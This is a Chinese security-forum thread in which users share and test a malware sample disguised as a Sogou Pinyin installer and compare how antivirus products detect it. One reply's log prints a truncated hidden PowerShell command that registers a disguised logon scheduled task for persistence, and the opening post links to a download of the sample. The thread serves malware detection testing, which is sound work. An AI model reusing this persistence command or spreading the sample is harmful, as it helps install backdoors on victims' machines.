查看: 1381|回复: 15
收起左侧

[病毒样本] fake搜狗输入法(过静态扫描)进化版 vt:0/55

[复制链接]
ulyanov2233
发表于 前天 20:43 | 显示全部楼层 |阅读模式
本帖最后由 ulyanov2233 于 2025-7-16 21:00 编辑

https://www.virustotal.com/gui/f ... 3990e1170?nocache=1
【sogoupinyin_2.15.6_install】
链接:https://qfile.qq.com/q/zst7zcTeO4 密码都是:infected
卡巴云拉黑衍生物
我的评价是你有这心思过静态不如想个新思路过下主防,你这病毒动静太大,但凡有点主防的杀软很难不发现。。。。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
lsop1349987
发表于 前天 20:58 | 显示全部楼层
emsi双击
  1. 2025/7/16 20:57:30
  2. 行为监控检测 可疑行为 "HiddenInstallation" 来自于 C:\Program Files (x86)\sogoupinyin_2.15.6_install\sogoupinyin_2.15.6_install\sogou_pinyin_guanwang_15.6.exe (SHA1: 2D0B28D5DE4FCE4D40B7E1EACC5916863AE2BF00)
复制代码
反病毒fileman
发表于 前天 21:00 | 显示全部楼层
这个还是你之前发的那个吧?
ulyanov2233
 楼主| 发表于 前天 21:01 | 显示全部楼层
反病毒fileman 发表于 2025-7-16 21:00
这个还是你之前发的那个吧?

从行为上看是同源的,但是这家银狐又想办法过了静态扫描
UNknownOoo
发表于 前天 21:05 | 显示全部楼层
火绒
运行:多步主防捉
  1. 防护项目:浏览器
  2. 操作目标:【执行】 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  3. 操作目标参数:powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "try { $existingTask = Get-ScheduledTask -TaskName "PowerAgent" -ErrorAction SilentlyContinue; if ($existingTask) { Unregister-ScheduledTask -TaskName "PowerAgent" -Confirm:$false }; $a = New-ScheduledTaskAction -Execute "C:\\Program Files (x86)\\sogoupinyin_2.15.6_install\\sogoupinyin_2.15.6_install\\Windows Startup Applications\\chrome.exe" -WorkingDirectory "C:\\Program Files (x86)\\sogoupinyin_2.15.6_install\\sogoupinyin_2.15.6_install\\Windows Startup Applications"; $tr = New-ScheduledTaskTrigger -AtLogon -User $env:USERNAME; $p = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive; $s = New-ScheduledTaskSettingsSet -Hidden -StartWhenAvailable -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit (New-TimeSpan -Hours 0); $task = New-ScheduledTask -Action $a -Trigger $tr -Principal $p -Settings $s -Description "System maintenance scanner"; Register-ScheduledTask -TaskName "PowerAgent" -In
  4. 操作结果:已允许
复制代码
  1. 防护项目:隐藏执行PowerShell
  2. 执行文件:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  3. 执行命令行:powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "try { $existingTask = Get-ScheduledTask -TaskName "PowerAgent" -ErrorAction SilentlyContinue; if ($existingTask) { Unregister-ScheduledTask -TaskName "PowerAgent" -Confirm:$false }; $a = New-ScheduledTaskAction -Execute "C:\\Program Files (x86)\\sogoupinyin_2.15.6_install\\sogoupinyin_2.15.6_install\\Windows Startup Applications\\chrome.exe" -WorkingDirectory "C:\\Program Files (x86)\\sogoupinyin_2.15.6_install\\sogoupinyin_2.15.6_install\\Windows Startup Applications"; $tr = New-ScheduledTaskTrigger -AtLogon -User $env:USERNAME; $p = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive; $s = New-ScheduledTaskSettingsSet -Hidden -StartWhenAvailable -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit (New-TimeSpan -Hours 0); $task = New-ScheduledTask -Action $a -Trigger $tr -Principal $p -Settings $s -Description "System maintenance scanner"; Register-ScheduledTask -TaskName "PowerAgent" -In
  4. 操作结果:已允许
复制代码
  1. 防护项目:系统任务目录
  2. 目标文件:C:\Windows\System32\Tasks\PowerAgent
  3. 操作结果:已允许
复制代码
  1. 防护项目:流行病毒
  2. 可疑文件:HKEY_LOCAL_MACHINE\SOFTWARE\IpDates_info
  3. 操作结果:已阻止
  4. 进程ID:8968
  5. 操作进程:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
复制代码
  1. 病毒名称:Backdoor/Lotok.UC
  2. 病毒路径:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
复制代码
骚猪
发表于 前天 21:05 | 显示全部楼层
卡巴右键扫描可杀啊,云入库这么快吗?
ulyanov2233
 楼主| 发表于 前天 21:07 | 显示全部楼层
骚猪 发表于 2025-7-16 21:05
卡巴右键扫描可杀啊,云入库这么快吗?

有其他地方的卡巴用户盯得比我还勤,我看到的时候eset和卡巴都云拉黑了dll,但是安装包没被拉黑
2025/7/16 20:45:44;文件系统实时防护;文件;C:\Users\Y8219\Downloads\chrome_elf\chrome_elf.dll;Suspicious Object;已通过删除清除;FIREFLY\Y8219;尝试通过应用程序访问文件时发生事件: C:\Windows\explorer.exe (D71741A8A93214B83AABF262CD725C818079C1B0).;CF7BF82C4CB30C4747C4DCAA0AF0231229847FC0;2025/7/16 20:45:36
tihs
发表于 前天 21:37 | 显示全部楼层
本帖最后由 tihs 于 2025-7-16 22:10 编辑



12天前的eset

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
心醉咖啡
发表于 前天 21:52 | 显示全部楼层
本帖最后由 心醉咖啡 于 2025-7-16 21:57 编辑

360扫描miss
superLYT
发表于 前天 22:42 | 显示全部楼层
本帖最后由 superLYT 于 2025-7-16 22:43 编辑

EIS第一次全程无响应,第二次云拉黑

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-18 12:40 , Processed in 0.132102 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表